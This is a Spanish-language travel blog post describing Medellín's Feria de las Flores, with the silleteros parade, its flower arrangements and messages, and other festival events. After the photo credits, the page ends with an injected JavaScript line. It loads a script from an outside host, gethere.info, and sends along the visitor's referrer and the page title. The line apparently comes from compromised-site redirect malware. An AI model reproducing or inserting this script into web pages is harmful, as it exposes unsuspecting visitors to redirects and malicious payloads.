La Feria de las Flores, el gran reclamo estival de Medellín

07/09/2016

L2F-Aug-16-pic-Colombia-Medellin-silleteros-desfile-Feria-Flores

A medida que Colombia ha ido emergiendo conforme dejaba atrás los conflictos internos relacionados con la droga y la violencia guerrillera de los años 80 y 90 (creando durante este proceso una floreciente industria turística con la que potenciar sus excelentes destinos) lo ha ido haciendo también la segunda mayor urbe del país: Medellín.

Ubicada en el seno de un valle andino en el Departamento de Antioquia, característica que le otorga ese agradable clima que le permite ser conocida como ‘la ciudad de la eterna primavera’, Medellín ha sido protagonista de ilustres episodios históricos desde sus orígenes a comienzos del siglo XVII. Sus décadas oscuras de finales del siglo XX ya han sido superadas gracias a políticas innovadoras y a importantes infraestructuras que han conferido a la capital un nuevo impulso vital y una notable reducción del crimen y la pobreza: la plaza dedicada a las esculturas de Fernando Botero, el gran artista local, y la red de teleféricos que ayuda a conectar las comunidades más humildes con el resto de la ciudad son sólo dos ejemplos del gran resurgir de Medellín.

En medio de esta trepidante cadena de acontecimientos, uno de los eventos más esperados en el calendario anual de Medallo (como se la conoce cariñosamente) es la Feria de las Flores, que se celebra durante varios días entre finales de julio y principios de agosto; en ella no sólo se muestra buena parte de la historia y la cultura de Antioquia, también se hace hincapié en uno de los pilares que sostienen la economía regional: aquí se produce el 25% del volumen floral que Colombia exporta al exterior. Aunque no se trata de una tradición ancestral, ya que el próximo verano se celebrará su sexuagésimo aniversario, la Feria de las Flores ha sido venerada durante generaciones, y, como Medellín está comenzando a atraer cada vez más turistas, se ha producido una especie de empate técnico en lo que al origen de visitantes se refiere: este año, los datos oficiales afirman que han sido unas 23.000 las personas que se han desplazado hasta la ciudad para saborear la fiesta, 11.000 de ellas extranjeras. Hablamos de turistas latinoamericanos y un número cada vez más elevado de europeos y norteamericanos.

L2F-Aug-16-pic-Colombia-Medellin-silleteros-Desfile

Los eventos más interesantes suelen tener lugar los últimos días de la Feria, culminando el domingo con el conocido Desfile de Silleteros, una procesión de tres horas de duración en la que los pequeños granjeros y productores de flores de las colinas de Antioquia acaparan todo el protagonismo. Se conocen coloquialmente como silleteros, vocablo procedente de la palabra silleta, un marco de madera con forma de silla utilizado para transportar las flores hasta el mercado cargándolas en su espalda; unos quinientos hombres y mujeres de todas las edades siguen bajando hasta Medellín cada mes de agosto para desfilar con sus productos y competir para obtener los mejores acuerdos comerciales en diferentes categorías.

Por ello, en esta ocasión me uní a la multitud para contemplar desde las gradas metálicas cómo desfilaban los silleteros. Sus cargas eran una mezcla de silletas clásicas, de forma cuadrada, con otros marcos más grandes y mucho más elaborados que deslumbraban gracias a sus llamativos colores y a los arreglos de gran complejidad que tenían aplicados; en este sentido, pudimos disfrutar de representaciones pictóricas y también abstractas, incluso logotipos comerciales de compañías colombianas e internacionales. Abundaban los mensajes en los que se promovía el respeto al medio ambiente, los derechos de las mujeres, la unidad familiar, las tradiciones culturales, la paz en el mundo y la reconciliación en Colombia después de varias décadas de conflicto con las guerrillas armadas. Uno de mis eslóganes favoritos fue aquél que rezaba ‘no permitas que la tecnología acabe con la interacción social’.

L2F-Aug-16-pic-Colombia-Medellin-silleteros-desfile-bailarines

Conforme iban pasando los silleteros, el público aplaudía, gritaba y cantaba ‘¡Vuelta, vuelta!’ para que los protagonistas exhibieran sus arreglos desde todos los ángulos. Me quedé maravillado por la facilidad que tenían estas personas (algunos de ellos muy jóvenes y otros de mucha edad) para transportar sobre sus espaldas estos artilugios de colores que llegan a pesar hasta ochenta kilos, y todo esto a lo largo de más de dos kilómetros bajo el implacable sol vespertino; eso sí, a la gran mayoría de ellos se les veía radiantes disfrutando de la atención y la adulación mostrada por los presentes. Después de todo, para muchos de ellos es el momento más importante del año.

Siendo honestos, y a pesar de lo atractivas que resultan estas exhibiciones, podría haber llegado a resultar un poco monótono de no ser por el resto de complementos del desfile, como los bailarines folclóricos, las bandas y otros artistas que se iban intercalando entre ellos; incluso había un grupo gay. La única nota extraña la encontré al final, cuando la fiesta se tornó de repente en un desfile militar y policial, incluyendo algunos boy-scouts. En mi humilde opinión, me pareció una manera discordante de terminar una fiesta de este calibre.

L2F-Aug-16-pic-Colombia-Medellin-Desfile-Coches-Antiguos

Por supuesto, fue un gran honor formar parte de la Feria de las Flores, teniendo en cuenta además que no es el único espectáculo en el que pasarlo bien durante la semana: fui a conciertos de grupos internacionales y también de talentos locales; presencié un desfile de coches antiguos con conductores ataviados con trajes de época (arriba); una exposición de orquídeas y otras flores en la que se intercalaban puestos de comida autóctona y vendedores de artesanías… Otros eventos que tuvieron lugar durante la Feria incluían una ‘alfombra de flores’ en una plaza de la ciudad, multitudinarios paseos en bicicleta, exhibiciones de ganado y otros shows, concursos y conciertos de lo más peculiar.

Hay muchas otras atracciones para tener en cuenta durante tu visita a Medellín, que abordaremos en un próximo post, todo ello aderezado con una temperatura primaveral durante cualquier época del año. ¿Te ha parecido bien la propuesta? Entonces comienza a plantearte venir en la primera semana de agosto de 2017, cuando la Feria de las Flores se vestirá de gala para celebrar su 60 aniversario. ¡Será algo increíble!

 

 

fotos | Medellín Convention and Visitors BureauMedellin Convention and Visitors BureauMedellín Convention and Visitors BureauDavid Paul Appell

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;